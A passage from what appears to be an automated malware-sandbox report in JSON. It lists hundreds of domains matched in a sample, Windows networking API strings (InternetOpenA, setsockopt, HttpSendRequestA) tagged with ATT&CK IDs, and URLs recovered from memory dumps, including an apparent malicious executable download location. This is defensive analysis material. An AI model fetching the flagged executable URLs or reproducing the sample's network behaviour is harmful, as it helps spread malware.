\"semasio.net\"\n Heuristic match: \"kuwan8.com\"\n Pattern match: \"www.aa.com\"\n Pattern match: \"www.irs.gov\"\n Heuristic match: \"owneriq.net\"\n Heuristic match: \"t-mobile.com\"\n Heuristic match: \"conectiva.io\"\n Heuristic match: \"ngfiles.com\"\n Heuristic match: \"gamespot.com\"\n Heuristic match: \"abtasty.com\"\n Heuristic match: \"adhigh.net\"\n Heuristic match: \"zoosnet.net\"\n Heuristic match: \"yahoo.com\"\n Heuristic match: \"yabidos.com\"\n Heuristic match: \"pardot.com\"\n Heuristic match: \"kugou.com\"\n Heuristic match: \"wbtrk.net\"\n Heuristic match: \"stardoll.com\"\n Heuristic match: \"adnxs.com\"\n Heuristic match: \"bitauto.com\"\n Heuristic match: \"esmas.com\"\n Heuristic match: \"adtdp.com\"\n Heuristic match: \"tidaltv.com\"\n Heuristic match: \"meituan.com\"\n Heuristic match: \"tw.yahoo.com\"\n Heuristic match: \"11st.co.kr\"\n Heuristic match: \"break.com\"\n Heuristic match: \"youdao.com\"\n Heuristic match: \"mashable.com\"\n Heuristic match: \"wrating.com\"\n Heuristic match: \"livedoor.com\"\n Heuristic match: \"85play.com\"\n Heuristic match: \"next.co.uk\"\n Heuristic match: \"ml314.com\"\n Heuristic match: \"secure-assets.rubiconproject.com\"\n Heuristic match: \"kpruanalytics.solution.weborama.fr\"\n Heuristic match: \"api.webdata.ledu.com\"\n Heuristic match: \"adaptv.advertising.com\"\n Heuristic match: \"rum-dytrc.corriere.it\"\n Pattern match: \"www.howstuffworks.com\"\n Heuristic match: \"livechatinc.com\"\n Heuristic match: \"technical-service.net\"\n Pattern match: \"www.americanas.com.br\"\n Heuristic match: \"ads.creative-serving.com\"\n Pattern match: \"www.reuters.wallst.com\"\n Pattern match: \"www.juegosdiarios.com\"\n Heuristic match: \"nationalgeographic.com\"\n Pattern match: \"www.tripadvisor.co.uk\"\n Pattern match: \"www.urbandictionary.com\"\n Heuristic match: \"kakakucom.112.2o7.net\"\n Heuristic match: \"pixel.rubiconproject.com\"\n Pattern match: \"www.credit-agricole.fr\"\n Heuristic match: \"scorecardresearch.com\"\n Heuristic match: \"tap.rubiconproject.com\"\n Heuristic match: \"adobe.tt.omtrdc.net\"\n Pattern match: \"www.liveadexchanger.com\"\n Heuristic match: \"moc.sys-gnivres.sb\"\n Heuristic match: \"bs.serving-sys.com\"\n Heuristic match: \"dotlinux02.doubledot.es\"\n Heuristic match: \"laredoute.commander1.com\"\n Heuristic match: \"tap2-cdn.rubiconproject.com\"\n Heuristic match: \"virginmedia.com\"\n Pattern match: \"www.amazon.de\"\n Heuristic match: \"convertro.com\"\n Heuristic match: \"api.unthem.com\"\n Pattern match: \"www.hao123.com\"\n Heuristic match: \"wordpress.org\"\n Heuristic match: \"pconline.com.cn\"\n Pattern match: \"www.blizzard.com\"\n Heuristic match: \"minijuegos.com\"\n Pattern match: \"www.hc360.com\"\n Pattern match: \"www.zimbio.com\"\n Heuristic match: \"everesttech.net\"\n Pattern match: \"www.114la.com\"\n Pattern match: \"www.toshiba.com\"\n Heuristic match: \"sharethis.com\"\n Pattern match: \"www.sogou.com\"\n Heuristic match: \"newgrounds.com\"\n Heuristic match: \"impress.co.jp\"\n Heuristic match: \"bigmining.com\"\n Pattern match: \"www.topix.com\"\n Heuristic match: \"adsymptotic.com\"\n Heuristic match: \"infospace.com\"\n Pattern match: \"www.metacafe.com\"\n Pattern match: \"www.tamgrt.com\"\n Heuristic match: \"a1.adform.net\"\n Heuristic match: \"match.rundsp.com\"\n Heuristic match: \"go.sonobi.com\"\n Heuristic match: \"wunderground.com\"\n Heuristic match: \"rtb.4finance.com\"\n Pattern match: \"www.msn.com\"\n Heuristic match: \"lightboxcdn.com\"\n Heuristic match: \"pi.pardot.com\"\n Heuristic match: \"indiatimes.com\"\n Heuristic match: \"pixel.keywee.co\"\n Pattern match: \"www.oricon.co.jp\"\n Heuristic match: \"springserve.com\"\n Heuristic match: \"accuweather.com\"\n Pattern match: \"www.pixnet.net\"\n Heuristic match: \"groupon.co.uk\"\n Heuristic match: \"pclady.com.cn\"\n Pattern match: \"www.corriere.it\"\n Heuristic match: \"casalemedia.com\"\n Heuristic match: \"mediaplex.com\"\n Heuristic match: \"tns-counter.ru\"\n Heuristic match: \"ads.linkedin.com\"\n Heuristic match: \"eastmoney.com\"\n Heuristic match: \"foodnetwork.com\"\n Heuristic match: \"targeting.unrulymedia.com\"\n Heuristic match: \"rubiconproject.com\"\n Pattern match: \"www.firstload.com\"\n Heuristic match: \"stats02.topix.com\"\n Heuristic match: \"pzd.rakuten.co.jp\"\n Heuristic match: \"image.livedoor.com\"\n Heuristic match: \"amazon-adsystem.com\"\n Heuristic match: \"giveawayoftheday.com\"\n Heuristic match: \"cstatic.weborama.fr\"\n Heuristic match: \"beacon.walmart.com\"\n Heuristic match: \"juegosdiarios.com\"\n Heuristic match: \"bpid.bigpoint.net\"\n Pattern match: \"www.virginmedia.com\"\n Heuristic match: \"trtstats.topix.com\"\n Heuristic match: \"count.pclady.com.cn\"\n Pattern match: \"www.tripadvisor.com\"\n Heuristic match: \"bbs.aoshitang.com\"\n Heuristic match: \"server.seadform.net\"\n Pattern match: \"www.thecredits.org\"\n Heuristic match: \"adfarm1.adition.com\"\n Pattern match: \"www.pcauto.com.cn\"\n Pattern match: \"www.autotrader.co.uk\"\n Heuristic match: \"bedbathandbeyond.com\"\n Pattern match: \"www.accuweather.com\"\n Heuristic match: \"howstuffworks.com\"\n Heuristic match: \"webcollect.kugou.com\"\n Pattern match: \"www.submarino.com.br\"\n Heuristic match: \"worldstarhiphop.com\"\n Heuristic match: \"wordreference.com\"\n Heuristic match: \"dmg.digitaltarget.ru\"\n Heuristic match: \"ezinearticles.com\"\n Heuristic match: \"brightonclick.com\"\n Pattern match: \"www.foodnetwork.com\"\n Heuristic match: \"savings-united.com\"\n Heuristic match: \"strawberryperl.com\"\n Heuristic match: \"americanas.com.br\"\n Pattern match: \"www.southwest.com\"\n Heuristic match: \"ads.stickyadstv.com\"\n Heuristic match: \"verizonwireless.com\"\n Heuristic match: \"horyzon-media.com\"\n Heuristic match: \"videoamp.com\"\n Heuristic match: \"openx.net\"\n Heuristic match: \"irs01.com\"\n Heuristic match: \"weborama.com\"\n Heuristic match: \"dotomi.com\"\n Heuristic match: \"pingdom.net\"\n Heuristic match: \"xunlei.com\"\n Heuristic match: \"cxense.com\"\n Heuristic match: \"xfinity.com\"\n Heuristic match: \"hubpages.com\"\n Heuristic match: \"mookie1.com\"\n Heuristic match: \"marinsm.com\"\n Pattern match: \"www.wsj.com\"\n Heuristic match: \"ad-stir.com\"\n Heuristic match: \"newscgp.com\"\n Heuristic match: \"yaplog.jp\"\n Heuristic match: \"miaozhen.com\"\n Heuristic match: \"amazon.de\"\n Heuristic match: \"webkinz.com\"\n Heuristic match: \"iza.ne.jp\"\n Heuristic match: \"soflopxl.com\"\n Heuristic match: \"patch.com\"\n Heuristic match: \"s3xified.com\"\n Heuristic match: \"united.com\"\n Heuristic match: \"zimbio.com\"\n Heuristic match: \"p.crm4d.com\"\n Heuristic match: \"114la.com\"\n Heuristic match: \"adgrx.com\"\n Heuristic match: \"topixcdn.com\"\n Heuristic match: \"weather.gov\"\n Heuristic match: \"cbsnews.com\"\n Heuristic match: \"seadform.net\"\n Heuristic match: \"c.bing.com\"\n Pattern match: \"www.fifa.com\"\n Heuristic match: \"sogou.com\"\n Heuristic match: \"net.finam.ru\"\n Heuristic match: \"topix.com\"\n Heuristic match: \"impdesk.com\"\n Heuristic match: \"outbrain.com\"\n Heuristic match: \"rising.cn\"\n Heuristic match: \"itsfogo.com\"\n Heuristic match: \"innovid.com\"\n Heuristic match: \"trialpay.com\"\n Heuristic match: \"yieldmo.com\"\n Heuristic match: \"tesco.com\"\n Heuristic match: \"thench.net\"\n Heuristic match: \"iqiyi.com\"\n Heuristic match: \"google.es\"\n Heuristic match: \"yieldlab.net\"\n Pattern match: \"www.onet.pl\"\n Heuristic match: \"rfihub.com\"\n Heuristic match: \"criteo.com\"\n Heuristic match: \"gosunpro.com\"\n Heuristic match: \"xdating.com\"\n Pattern match: \"www.pof.com\"\n Heuristic match: \"mobile.de\"\n Pattern match: \"www.nationalgeographic.com\"\n Heuristic match: \"tap-secure.rubiconproject.com\"\n Heuristic match: \"8428790487.log.optimizely.com\"\n Heuristic match: \"droit-finances.commentcamarche.net\"\n Heuristic match: \"espncricinfo.com\"\n Heuristic match: \"undertone.com\"\n Heuristic match: \"doubleclick.net\"\n Heuristic match: \"scanscout.com\"\n Heuristic match: \"vagalume.com.br\"\n Heuristic match: \"flashtalking.com\"\n Pattern match: \"www.ryanair.com\"\n Pattern match: \"www.reuters.com\"\n Pattern match: \"www.toysrus.com\"\n Heuristic match: \"sharethrough.com\"\n Heuristic match: \"myvisualiq.net\"\n Pattern match: \"www.nextag.com\"\n Pattern match: \"www.foxnews.com\"\n Heuristic match: \"send.microad.jp\"\n Heuristic match: \"ads.pubmatic.com\"\n Heuristic match: \"track.wvtu.net\"\n Heuristic match: \"etsystudio.com\"\n Pattern match: \"www.drugs.com\"\n Heuristic match: \"dantri.com.vn\"\n Heuristic match: \"onesignal.com\"\n Pattern match: \"www.izlesene.com\"\n Pattern match: \"www.stardoll.com\"\n Heuristic match: \"ads.webkinz.com\"\n Pattern match: \"www.usatoday.com\"\n Heuristic match: \"my.rtmark.net\"\n Pattern match: \"www.agame.com\"\n Heuristic match: \"hubstatic.com\"\n Heuristic match: \"travelzoo.com\"\n Heuristic match: \"moviefone.com\"\n Pattern match: \"www.aipai.com\"\n Heuristic match: \"tripadvisor.com\"\n Pattern match: \"www.latimes.com\"\n Pattern match: \"www.mp3raid.xyz\"\n Heuristic match: \"thecredits.org\"\n Heuristic match: \"dpm.demdex.net\"\n Heuristic match: \"sundaysky.com\"\n Heuristic match: \"switchadhub.com\"\n Heuristic match: \"ad.360yield.com\"\n Heuristic match: \"creativecdn.com\"\n Heuristic match: \"ipredictive.com\"\n Heuristic match: \"xpg.uol.com.br\"\n Heuristic match: \"tealiumiq.com\"\n Heuristic match: \"admaster.com.cn\"\n Heuristic match: \"basebanner.com\"\n Heuristic match: \"eyeviewads.com\"\n Heuristic match: \"mtvnservices.com\"\n Heuristic match: \"freegeoip.net\"\n Heuristic match: \"connexity.net\"\n Heuristic match: \"58011369.log.optimizely.com\"\n Heuristic match: \"621373388.log.optimizely.com\"\n Heuristic match: \"match.adsby.bidtheatre.com\"\n Heuristic match: \"200632758.log.optimizely.com\"\n Heuristic match: \"login.microsoftonline.com\"\n Heuristic match: \"adotmob.com\"\n Heuristic match: \"thesun.co.uk\"\n Heuristic match: \"xcar.com.cn\"\n Heuristic match: \"renren.com\"\n Heuristic match: \"makepolo.com\"\n Heuristic match: \"mthai.com\"\n Heuristic match: \"gumtree.com\"\n Heuristic match: \"melia.com\"\n Heuristic match: \"wikihow.com\"\n Heuristic match: \"verizon.com\"\n Pattern match: \"www.citi.com\"\n Heuristic match: \"yahoo.co.jp\"\n Heuristic match: \"scribd.com\"\n Heuristic match: \"weborama.fr\"\n Heuristic match: \"51job.com\"\n Heuristic match: \"demdex.net\"\n Heuristic match: \"extend.tv\"\n Heuristic match: \"norton.com\"\n Heuristic match: \"answers.com\"\n Heuristic match: \"aipai.com\"\n Heuristic match: \"3lift.com\"\n Heuristic match: \"mxptint.net\"\n Heuristic match: \"xtgreat.com\"\n Heuristic match: \"taboola.com\"\n Heuristic match: \"exblog.jp\"\n Heuristic match: \"media.net\"\n Heuristic match: \"adobe.com\"\n Heuristic match: \"drugs.com\"\n Heuristic match: \"oracle.com\"\n Heuristic match: \"jivox.com\"\n Heuristic match: \"friend.ly\"\n Heuristic match: \"wupload.com\"\n Heuristic match: \"logly.co.jp\"\n Heuristic match: \"gametop.com\"\n Pattern match: \"www.gov.uk\"\n Heuristic match: \"hotwire.com\"\n Heuristic match: \"adhood.com\"\n Heuristic match: \"sanspo.com\"\n Heuristic match: \"mmstat.com\"\n Heuristic match: \"teacup.com\"\n Heuristic match: \"virgul.com\"\n Heuristic match: \"rockyou.net\"\n Heuristic match: \"nicovideo.jp\"\n Heuristic match: \"im-apps.net\"\n Heuristic match: \"adingo.jp\"\n Heuristic match: \"socdm.com\"\n Heuristic match: \"agame.com\"\n Heuristic match: \"eonline.com\"\n Heuristic match: \"altergeo.ru\"\n Heuristic match: \"serve.popads.net\"\n Pattern match: \"www.musica.com\"\n Heuristic match: \"tripod.lycos.com\"\n Heuristic match: \"shopathome.com\"\n Heuristic match: \"lineadirecta.com\"\n Heuristic match: \"shockwave.com\"\n Heuristic match: \"postrelease.com\"\n Heuristic match: \"visualdna.com\"\n Pattern match: \"www.iqiyi.com\"\n Heuristic match: \"liutilities.com\"\n Heuristic match: \"superpages.com\"\n Heuristic match: \"acxiomapac.com\"\n Heuristic match: \"dlx.addthis.com\"\n Heuristic match: \"websimages.com\"\n Heuristic match: \"slideshare.net\"\n Heuristic match: \"stars.topix.com\"\n Heuristic match: \"moc.tniopgib.se\"\n Heuristic match: \"es.bigpoint.com\"\n Heuristic match: \"nickelodeon.es\"\n Heuristic match: \"ke.youdao.com\"\n Pattern match: \"www.compado.es\"\n Pattern match: \"www.linkedin.com\"\n Heuristic match: \"optimatic.com\"\n Pattern match: \"www.amazon.com\"\n Pattern match: \"www.aweber.com\"\n Heuristic match: \"domaintools.com\"\n Heuristic match: \"doctissimo.fr\"\n Heuristic match: \"gmarket.co.kr\"\n Heuristic match: \"southwest.com\"\n Heuristic match: \"city-data.com\"\n Heuristic match: \"adventori.com\"\n Heuristic match: \"rcsmetrics.it\"\n Heuristic match: \"4paradigm.com\"\n Heuristic match: \"craigslist.org\"\n Pattern match: \"www.livedoor.com\"\n Heuristic match: \"quantserve.com\"\n Heuristic match: \"autoitscript.com\"\n Heuristic match: \"statcounter.com\"\n Heuristic match: \"yumenetworks.com\"\n Pattern match: \"www.avast.com\"\n Heuristic match: \"infoseek.co.jp\"\n Heuristic match: \"craigslist.es\"\n Heuristic match: \"capitalone.com\"\n Heuristic match: \"monografias.com\"\n Heuristic match: \"dell.com\"\n Heuristic match: \"ebay.com\"\n Heuristic match: \"cpx.to\"\n Heuristic match: \"pof.com\"\n Heuristic match: \"yoka.com\"\n Heuristic match: \"1rx.io\"\n Heuristic match: \"bing.com\"\n Heuristic match: \"teads.tv\"\n Heuristic match: \"2o7.net\"\n Heuristic match: \"vk.com\"\n Heuristic match: \"m18.com\"\n Heuristic match: \"m6r.eu\"\n Heuristic match: \"ebay.it\"\n Heuristic match: \"ups.com\"\n Heuristic match: \"mtv.com\"\n Heuristic match: \"ing.nl\"\n Heuristic match: \"mail.ru\"\n Heuristic match: \"king.com\"\n Heuristic match: \"turn.com\"\n Heuristic match: \"ledu.com\"\n Heuristic match: \"smi2.net\"\n Heuristic match: \"yadro.ru\"\n Heuristic match: \"l.qq.com\"\n Heuristic match: \"zedo.com\"\n Heuristic match: \"kbb.com\"\n Heuristic match: \"goal.com\"\n Heuristic match: \"ya.ru\"\n Heuristic match: \"erne.co\"\n Heuristic match: \"imvu.com\"\n Heuristic match: \"wat.tv\"\n Heuristic match: \"sapo.pt\"\n Heuristic match: \"96pk.com\"\n Heuristic match: \"dsp.io\"\n Heuristic match: \"kdata.fr\"\n Heuristic match: \"5ch.net\"\n Heuristic match: \"ask.com\"\n Heuristic match: \"citi.com\"\n Heuristic match: \"qvc.com\"\n Heuristic match: \"esm1.net\"\n Heuristic match: \"ur.pk\"\n Heuristic match: \"kp.ru\"\n Heuristic match: \"254a.com\"\n Heuristic match: \"hi5.com\"\n Heuristic match: \"58.com\"\n Heuristic match: \"chip.de\"\n Heuristic match: \"msn.com\"\n Heuristic match: \"web.de\"\n Heuristic match: \"abmr.net\"\n Heuristic match: \"imdb.com\"\n Heuristic match: \"tmz.com\"\n Heuristic match: \"eol.cn\"\n Heuristic match: \"51.com\"\n Heuristic match: \"bild.de\"\n Heuristic match: \"1dmp.io\"\n Heuristic match: \"alot.com\"\n Heuristic match: \"smi2.ru\"\n Heuristic match: \"adtechus.com\"\n Heuristic match: \"zillow.com\"\n Heuristic match: \"keyade.com\"\n Heuristic match: \"qunar.com\"\n Heuristic match: \"addthis.com\"\n Heuristic match: \"durasite.net\"\n Heuristic match: \"adriver.ru\"\n Heuristic match: \"tao123.com\"\n Heuristic match: \"gwallet.com\"\n Heuristic match: \"atwiki.jp\"\n Heuristic match: \"globo.com\"\n Heuristic match: \"vtracy.de\"\n Heuristic match: \"zappos.com\"\n Heuristic match: \"yandex.ru\"\n Heuristic match: \"europa.eu\"\n Heuristic match: \"ad.zanox.com\"\n Pattern match: \"www.kbb.com\"\n Pattern match: \"www.7k7k.com\"\n Heuristic match: \"antdsp.com\"\n Heuristic match: \"virool.com\"\n Pattern match: \"www.duba.com\"\n Heuristic match: \"asahi.com\"\n Heuristic match: \"elpais.com\"\n Heuristic match: \"docin.com\"\n Heuristic match: \"python.org\"\n Heuristic match: \"globalwebindex.net\"\n Heuristic match: \"whisky.ana.stg8.com\"\n Pattern match: \"www.whitepages.com\"\n Heuristic match: \"count.pcauto.com.cn\"\n Pattern match: \"www.netshoes.com.br\"\n Heuristic match: \"minijuegosgratis.com\"\n Heuristic match: \"vatrack.hinet.net\"\n Pattern match: \"www.buenastareas.com\"\n Pattern match: \"www.maxonclick.com\"\n Heuristic match: \"acuityplatform.com\"\n Heuristic match: \"ads.programattik.com\"\n Heuristic match: \"power.gosunpro.com\"\n Heuristic match: \"company-target.com\"\n Heuristic match: \"sxp.smartclip.net\"\n Heuristic match: \"s.thebrighttag.com\"\n Heuristic match: \"angelfire.lycos.com\"\n Pattern match: \"www.warnerbros.com\"\n Heuristic match: \"liveadexchanger.com\"\n Pattern match: \"www.wunderground.com\"\n Heuristic match: \"bleacherreport.com\"\n Pattern match: \"www.pagesjaunes.fr\"\n Pattern match: \"www.superpages.com\"\n Pattern match: \"www.milliyet.com.tr\"\n Heuristic match: \"counter.pixplug.in\"\n Pattern match: \"www.newgrounds.com\"\n Heuristic match: \"sp1.convertro.com\"\n Heuristic match: \"moshimonsters.com\"\n Pattern match: \"www.cheapoair.com\"\n Pattern match: \"www.instagram.com\"\n Heuristic match: \"addictinggames.com\"\n Heuristic match: \"bankofamerica.com\"\n Heuristic match: \"tripadvisor.co.uk\"\n Pattern match: \"www.espncricinfo.com\"\n Heuristic match: \"bluekai.com\"\n Heuristic match: \"pubmatic.com\"\n Heuristic match: \"amazon.co.jp\"\n Heuristic match: \"ctnsnet.com\"\n Heuristic match: \"btrll.com\"\n Heuristic match: \"easydmp.net\"\n Heuristic match: \"mirtesen.ru\"\n Heuristic match: \"state.gov\"\n Heuristic match: \"kakaku.com\"\n Heuristic match: \"pixnet.net\"\n Heuristic match: \"aidata.io\"\n Heuristic match: \"eyeota.net\"\n Heuristic match: \"directv.com\"\n Heuristic match: \"mathtag.com\"\n Heuristic match: \"foxnews.com\"\n Heuristic match: \"deqwas.net\"\n Pattern match: \"www.ing.nl\"\n Heuristic match: \"adtechjp.com\"\n Heuristic match: \"yengo.com\"\n Heuristic match: \"laredoute.fr\"\n Heuristic match: \"addtoany.com\"\n Heuristic match: \"fandango.com\"\n Heuristic match: \"netseer.com\"\n Heuristic match: \"softonic.com\"\n Heuristic match: \"glotgrx.com\"\n Heuristic match: \"hc360.com\"\n Heuristic match: \"adsrvr.org\"\n Heuristic match: \"4shared.com\"\n Heuristic match: \"facebook.com\"\n Heuristic match: \"abril.com.br\"\n Heuristic match: \"duote.com\"\n Heuristic match: \"usafis.org\"\n Heuristic match: \"hubspot.net\"\n Heuristic match: \"netmng.com\"\n Heuristic match: \"365profx.com\"\n Heuristic match: \"simpli.fi\"\n Heuristic match: \"latimes.com\"\n Heuristic match: \"reuters.com\"\n Heuristic match: \"ryanair.com\"\n Heuristic match: \"toysrus.com\"\n Heuristic match: \"districtm.ca\"\n Heuristic match: \"rlcdn.com\"\n Heuristic match: \"blogcu.com\"\n Pattern match: \"www.free.fr\"\n Heuristic match: \"ligadx.com\"\n Heuristic match: \"sahcdn.com\"\n Heuristic match: \"moc.udiab.mh\"\n Heuristic match: \"hm.baidu.com\"\n Heuristic match: \"api.bing.com\"\n Pattern match: \"www.pnc.com\"\n Heuristic match: \"pixnet.cc\"\n Heuristic match: \"360doc.com\"\n Heuristic match: \"liadm.com\"\n Heuristic match: \"pixanalytics.com\"\n Heuristic match: \"dowjoneson.com\"\n Pattern match: \"www.goo.ne.jp\"\n Pattern match: \"www2.bing.com\"\n Heuristic match: \"blackberry.com\"\n Heuristic match: \"infolinks.com\"\n Heuristic match: \"pos.baidu.com\"\n Heuristic match: \"baixaki.com.br\"\n Heuristic match: \"autotrader.com\"\n Heuristic match: \"autoscout24.be\"\n Heuristic match: \"it.ebayrtm.com\"\n Heuristic match: \"walgreens.com\"\n Heuristic match: \"people.com.cn\"\n Heuristic match: \"nakanohito.jp\"\n Heuristic match: \"hit.gemius.pl\"\n Heuristic match: \"babycenter.com\"\n Heuristic match: \"rakuten.co.jp\"\n Pattern match: \"www.jalan.net\"\n Heuristic match: \"dragonfable.com\"\n Heuristic match: \"armorgames.com\"\n Heuristic match: \"contextweb.com\"\n Heuristic match: \"autotrader.co.uk\"\n Heuristic match: \"skysports.com\"\n Heuristic match: \"gamesgames.com\"\n Heuristic match: \"shutterfly.com\"\n Pattern match: \"www.answers.com\"\n Heuristic match: \"track.adform.net\"\n Heuristic match: \"sync.shinobi.jp\"\n Heuristic match: \"commander1.com\"\n Heuristic match: \"j.mrpdata.net\"\n Pattern match: \"www.sanspo.com\"\n Pattern match: \"www.teacup.com\"\n Pattern match: \"www.zillow.com\"\n Heuristic match: \"linternaute.com\"\n Heuristic match: \"usmagazine.com\"\n Pattern match: \"www.gosunpro.com\"\n Pattern match: \"www.xfinity.com\"\n Heuristic match: \"serving-sys.com\"\n Heuristic match: \"sitescout.com\"\n Heuristic match: \"priceline.com\"\n Heuristic match: \"cheapoair.com\"\n Heuristic match: \"matome.naver.jp\"\n Heuristic match: \"advertising.com\"\n Pattern match: \"www.match.com\"\n Heuristic match: \"velocecdn.com\"\n Heuristic match: \"i-mobile.co.jp\"\n Heuristic match: \"imrworldwide.com\"\n Heuristic match: \"mtvn.demdex.net\"\n Heuristic match: \"moc.hctam.se\"\n Heuristic match: \"es.match.com\"\n Heuristic match: \"zemanta.com\"\n Heuristic match: \"oricon.co.jp\"\n Heuristic match: \"pj.abema.nl\"\n Heuristic match: \"ln.ameba.jp\"\n Heuristic match: \"lashou.com\"\n Heuristic match: \"cookpad.com\"\n Heuristic match: \"hao123.com\"\n Heuristic match: \"blizzard.com\"\n Heuristic match: \"rambler.ru\"\n Heuristic match: \"badoo.com\"\n Heuristic match: \"amazon.com\"\n Heuristic match: \"m0mentum.net\"\n Pattern match: \"www.ikea.com\"\n Heuristic match: \"atdmt.com\"\n Heuristic match: \"adswizz.com\"\n Heuristic match: \"libero.it\"\n Pattern match: \"www.webs.com\"\n Heuristic match: \"360daily.com\"\n Heuristic match: \"adrta.com\"\n Heuristic match: \"compado.es\"\n Heuristic match: \"mapquest.com\"\n Pattern match: \"www.3366.com\"\n Heuristic match: \"twitter.com\"\n Heuristic match: \"tagged.com\"\n Heuristic match: \"fidelity.com\"\n Heuristic match: \"youtube.com\"\n Heuristic match: \"foxtab.com\"\n Heuristic match: \"wretch.cc\"\n Heuristic match: \"60photos.com\"\n Heuristic match: \"aweber.com\"\n Heuristic match: \"weather.com\"\n Heuristic match: \"bigpoint.com\"\n Heuristic match: \"taobao.com\"\n Heuristic match: \"ebay.com.au\"\n Heuristic match: \"musica.com\"\n Heuristic match: \"wushen.com\"\n Heuristic match: \"exelator.com\"\n Heuristic match: \"navdmp.com\"\n Heuristic match: \"popads.net\"\n Heuristic match: \"douban.com\"\n Heuristic match: \"jxedt.com\"\n Heuristic match: \"adscale.de\"\n Pattern match: \"www.pof.es\"\n Heuristic match: \"buzzle.com\"\n Pattern match: \"www.ning.com\"\n Pattern match: \"www.kp.ru\"\n Heuristic match: \"kohls.com\"\n Heuristic match: \"impact-ad.jp\"\n Heuristic match: \"corriere.it\"\n Heuristic match: \"mynet.com\"\n Heuristic match: \"statse.webtrendslive.com\"\n Heuristic match: \"neural09.cdnwebcloud.com\"\n Heuristic match: \"national-lottery.co.uk\"\n Heuristic match: \"nexac.demdex.net\"\n Pattern match: \"www.lazada.vn\"\n Heuristic match: \"reference.com\"\n Pattern match: \"www.scribd.com\"\n Heuristic match: \"flipboard.com\"\n Heuristic match: \"piximedia.com\"\n Heuristic match: \"milliyet.com.tr\"\n Pattern match: \"www.meetic.es\"\n Heuristic match: \"bidswitch.net\"\n Heuristic match: \"allabout.co.jp\"\n Heuristic match: \"brothersoft.com\"\n Heuristic match: \"accengage.net\"\n Pattern match: \"www.kohls.com\"\n Heuristic match: \"homedepot.com\"\n Heuristic match: \"crwdcntrl.net\"\n Pattern match: \"www.mynet.com\"\n Heuristic match: \"justanswer.com\"\n Heuristic match: \"pcauto.com.cn\"\n Heuristic match: \"mediafire.com\"\n Heuristic match: \"metacafe.com\"\n Heuristic match: \"adyun.com\"\n Pattern match: \"www.sapo.pt\"\n Heuristic match: \"stat.eol.cn\"\n Heuristic match: \"digitru.st\"\n Pattern match: \"www.eol.cn\"\n Heuristic match: \"afy11.net\"\n Heuristic match: \"i.liadm.com\"\n Heuristic match: \"angsrvr.com\"\n Heuristic match: \"adform.net\"\n Heuristic match: \"moevideo.net\"\n Pattern match: \"www.bing.com\"\n Heuristic match: \"nexage.com\"\n Heuristic match: \"districtm.io\"\n Heuristic match: \"tapad.com\"\n Heuristic match: \"gnavi.co.jp\"\n Heuristic match: \"bla01.com\"\n Heuristic match: \"gismeteo.ru\"\n Heuristic match: \"linkedin.com\"\n Heuristic match: \"deloton.com\"\n Heuristic match: \"c.msn.com\"\n Heuristic match: \"goo.ne.jp\"\n Heuristic match: \"readme.ru\"\n Heuristic match: \"bat.bing.com\"\n Heuristic match: \"rutube.ru\"\n Pattern match: \"www.qvc.com\"\n Heuristic match: \"wayfair.com\"\n Heuristic match: \"bttrack.com\"\n Heuristic match: \"ournba.net\"\n Heuristic match: \"toshiba.com\"\n Heuristic match: \"beemp3s.org\"\n Heuristic match: \"qtmojo.com\"\n Heuristic match: \"piriform.com\"\n Heuristic match: \"adtech.de\"\n Heuristic match: \"ixiaa.com\"\n Pattern match: \"www.gmx.net\"\n Heuristic match: \"jalan.net\"\n Heuristic match: \"nextag.com\"\n Heuristic match: \"smartadserver.com\"\n Heuristic match: \"legolas-media.com\"\n Pattern match: \"www.monografias.com\"\n Pattern match: \"www.priceline.com\"\n Heuristic match: \"ih.adscale.de\"\n Pattern match: \"www.rakuten.co.jp\"\n Heuristic match: \"gateway.foresee.com\"\n Heuristic match: \"same.eastmoney.com\"\n Heuristic match: \"enfemenino.com\"\n Heuristic match: \"netshoes.com.br\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-419", "type": 2, "relevance": 1, "name": "Contains ability to open a port and listen for incoming connection (API string)", "description": "Found reference to API \"setsockopt\" (Indicator: \"setsockopt\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")", "origin": "File/Memory", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://www.zigui.org/article.php?id=103822.y\" - Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp\")\n Found URL \"http://www.zigui.org/article.php?id=103822lmem\" - Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp\")\n Found URL \"http://www.3721.com/adjusttime.htmmozilla/4.0\" - Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found URL \"http://%s/https://http://abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/=quitdele\" - Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found URL \"http://www.mxm9191.com/myrunner_up.exehttp://www.zigui.org/article.php?id=103822.exe.exe.exe.exeqqtalk.execctv.exeflash.exeflash.exe.exeflash.exe.exe.exe.exe.exe.exemerrychristmasinternatinternat.exemspbint.exemspsint.exemssysint.exeiexplore\" - Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found 